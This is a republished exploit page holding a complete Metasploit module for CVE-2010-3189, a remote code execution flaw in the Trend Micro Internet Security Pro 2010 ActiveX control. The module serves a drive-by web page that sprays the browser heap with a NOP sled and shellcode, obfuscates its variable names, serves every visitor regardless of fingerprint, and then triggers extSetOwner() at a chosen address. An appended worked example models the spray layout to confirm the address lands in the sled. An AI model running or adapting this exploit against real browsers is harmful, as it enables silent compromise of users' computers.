Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution
Source: http://www.rec-sec.com  Author: Trancer  Published: 2010-10-01

##
# trendmicro_extsetowner.rb
#
# Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution exploit for the Metasploit Framework
#
# Exploit successfully tested on the following platforms:
#  - Trend Micro Internet Security Pro 2010 on Internet Explorer 7, Windows XP SP3
#  - Trend Micro Internet Security Pro 2010 on Internet Explorer 7, Windows Vista SP2
#
# UfPBCtrl.dll version tested:
# File Version: 17.50.0.1366
# ClassID: 15DBC3F9-9F0A-472E-8061-043D9CEC52F0
# RegKey Safe for Script: True
# RegKey Safe for Init: True
# KillBitSet: False
#
# References:
#  - CVE-2010-3189
#  - OSVDB 67561
#  - http://www.zerodayinitiative.com/advisories/ZDI-10-165/ - Original advisory by Andrea Micalizzi aka rgod via Zero Day Initiative
#  - http://www.exploit-db.com/exploits/14878/ - MOAUB #03 exploit
#  - http://www.exploit-db.com/trend-micro-internet-security-pro-2010-activex-extsetowner-remote-code-execution/ - MOAUB #03 binary analysis
#  - http://www.rec-sec.com/2010/09/28/trend-micro-internet-security-2010-rce-exploit/ - Metasploit exploit by Trancer, Recognize-Security
#
# Trancer
# http://www.rec-sec.com
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution',
      'Description'    => %q{
        This module exploits a remote code execution vulnerability in the
        Trend Micro Internet Security Pro 2010 ActiveX control (UfPBCtrl.dll).
        The extSetOwner() method accepts a pointer value without validating
        it. By passing an attacker-chosen address and spraying the browser
        heap so that a NOP sled followed by the payload sits at that address,
        an attacker may be able to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Trancer <mtrancer[at]gmail.com>' ],
      'Version'        => '$Revision:$',
      'References'     =>
        [
          [ 'CVE', '2010-3189' ],
          [ 'OSVDB', '67561' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-165/' ], # Andrea Micalizzi aka rgod via Zero Day Initiative
          [ 'URL', 'http://www.exploit-db.com/exploits/14878/' ],               # MOAUB #03
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'         => 1024,
          'BadChars'      => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # 'Ret' is the address handed to extSetOwner(); the heap spray in
          # on_request_uri() must place a NOP sled at this address.
          [ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x00C750A1 } ]
        ],
      'DisclosureDate' => 'Aug 25 2010',
      'DefaultTarget'  => 0))
  end

  # Serve the exploit page to every client instead of letting the framework
  # filter requests by browser/OS fingerprint.
  def autofilter
    false
  end

  def check_dependencies
    use_zlib
  end

  def on_request_uri(cli, request)
    # Re-generate the payload for this client.
    return if ((p = regenerate_payload(cli)) == nil)

    # Encode the shellcode as %uXXXX escapes for JavaScript's unescape();
    # each escape becomes one 16-bit character, i.e. two payload bytes.
    shellcode = Rex::Text.to_unescape(p.encoded, Rex::Arch.endian(target.arch))

    # Setup exploit buffers.
    # 'ret' is the target address packed little-endian and %u-escaped, so the
    # string passed to extSetOwner() carries the raw address bytes.
    nops      = Rex::Text.to_unescape(make_nops(4))
    ret       = Rex::Text.to_unescape([target.ret].pack('V'))
    blocksize = 0x40000   # characters (2 bytes each) per sprayed block
    fillto    = 500       # number of blocks sprayed

    # ActiveX parameters
    clsid = "15DBC3F9-9F0A-472E-8061-043D9CEC52F0"

    # Randomize the JavaScript variable names
    ufpbctrl     = rand_text_alpha(rand(100) + 1)
    j_shellcode  = rand_text_alpha(rand(100) + 1)
    j_nops       = rand_text_alpha(rand(100) + 1)
    j_ret        = rand_text_alpha(rand(100) + 1)
    j_headersize = rand_text_alpha(rand(100) + 1)
    j_slackspace = rand_text_alpha(rand(100) + 1)
    j_fillblock  = rand_text_alpha(rand(100) + 1)
    j_block      = rand_text_alpha(rand(100) + 1)
    j_memory     = rand_text_alpha(rand(100) + 1)
    j_counter    = rand_text_alpha(rand(30) + 2)

    # Heap spray: 'headersize' characters are reserved for the string's heap
    # and BSTR headers, so that each sprayed string (NOP sled + shellcode)
    # fills a block of exactly 'blocksize' characters. 'fillto' such strings
    # are kept alive in an array, then the control is called with the
    # target address as its argument.
    html = %Q|<html>
<object classid='clsid:#{clsid}' id='#{ufpbctrl}'></object>
<script>
var #{j_shellcode} = unescape('#{shellcode}');
var #{j_nops} = unescape('#{nops}');
var #{j_headersize} = 20;
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
var #{j_memory} = new Array();
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
 #{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
}
#{ufpbctrl}.extSetOwner(unescape('#{ret}'));
</script>
</html>|

    print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

    # Transmit the response to the client
    send_response(cli, html, { 'Content-Type' => 'text/html' })

    # Handle the payload
    handler(cli)
  end
end
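The spray in on_request_uri() only works if the address handed to extSetOwner() (the target's 'Ret', 0x00C750A1) falls inside the NOP sled of one of the sprayed strings rather than in a string header or in the shellcode. The following is an added worked example, written for this page and not part of Trancer's module: it replays the module's string-building loops on character counts alone (no real strings are built), so it can run in Node, and classifies where a given address lands. It assumes, as the spray technique itself does, that every unescape('%uXXXX') group is one 16-bit character (so make_nops(4) becomes 2 characters) and that the browser heap places each sprayed string at a multiple of its allocation size, so that the address modulo the allocation size is the offset inside a block. The 600-byte payload length is a constructed sample within the module's Space of 1024.

```javascript
// Added example (not part of the original module): a character-count model of
// the heap spray built by the module's JavaScript, plus a check of where the
// address passed to extSetOwner() lands inside a sprayed block.
//
// Assumptions, stated here because the page does not spell them out:
//  - each unescape('%uXXXX') group is one 16-bit character, so n payload bytes
//    become ceil(n / 2) characters and make_nops(4) becomes 2 characters;
//  - the browser heap places every sprayed string at a multiple of its
//    allocation size, so (address % allocationBytes) is the offset inside a
//    block. This is the premise of the spray, not something the model proves.

const BLOCKSIZE  = 0x40000;    // characters per block, as in the module
const HEADERSIZE = 20;         // characters reserved for heap/BSTR headers, as in the module
const FILLTO     = 500;        // number of sprayed blocks, as in the module
const RET        = 0x00C750A1; // the target's 'Ret', passed to extSetOwner()

// Replay the module's string-building loops on lengths only.
function sprayLayout(shellcodeBytes, blocksize = BLOCKSIZE, headersize = HEADERSIZE) {
  const shellcodeChars = Math.ceil(shellcodeBytes / 2);
  const slackspace = headersize + shellcodeChars;
  let nops = 2;                                    // unescape of make_nops(4)
  while (nops < slackspace) nops += nops;          // nops += nops
  let block = nops - slackspace;                   // nops.substring(0, nops.length - slackspace)
  while (block + slackspace < blocksize) {         // block = block + block + fillblock
    block = block + block + slackspace;
  }
  const stringChars = block + shellcodeChars;      // memory[i] = block + shellcode
  return {
    nopBytes:        block * 2,
    shellcodeBytes:  shellcodeChars * 2,
    stringBytes:     stringChars * 2,
    // String data plus the reserved header characters. Because nops is a power
    // of two and 0x40000 is too, the doubling loop stops at exactly blocksize
    // characters, so this is 2 * blocksize bytes regardless of payload size.
    allocationBytes: (stringChars + headersize) * 2,
  };
}

// Total bytes the spray allocates. Reaching 'address' requires (but is not
// guaranteed by) a spray at least that large.
function sprayBytes(layout, fillto = FILLTO) {
  return layout.allocationBytes * fillto;
}

// Where 'address' falls inside a sprayed block. The split of the reserved
// bytes between heap header, BSTR length prefix and trailing terminator is
// not modelled, so "nops" is only returned for offsets that are NOP bytes
// under every possible split: past all reserved bytes and before the earliest
// offset at which the shellcode could begin.
function landingZone(address, layout) {
  const offset = address % layout.allocationBytes;
  const reserved = layout.allocationBytes - layout.stringBytes;
  if (offset < reserved) return "header";
  if (offset < layout.nopBytes) return "nops";
  return "tail";                                   // shellcode or terminator
}

// Constructed sample: a 600-byte encoded payload.
const sampleLayout = sprayLayout(600);
console.log(sampleLayout);
console.log("spray size:", sprayBytes(sampleLayout), "bytes");
console.log("0x" + RET.toString(16), "lands in:", landingZone(RET, sampleLayout));
```

For any payload up to the module's 1024-byte Space the allocation comes out at 0x80000 bytes, and 0x00C750A1 modulo that is 0x750A1, which is well inside the sled; the same check on an address with a low offset (for example 0x00C00010) reports "header", which is where a spray-based exploit would crash instead of executing.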

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved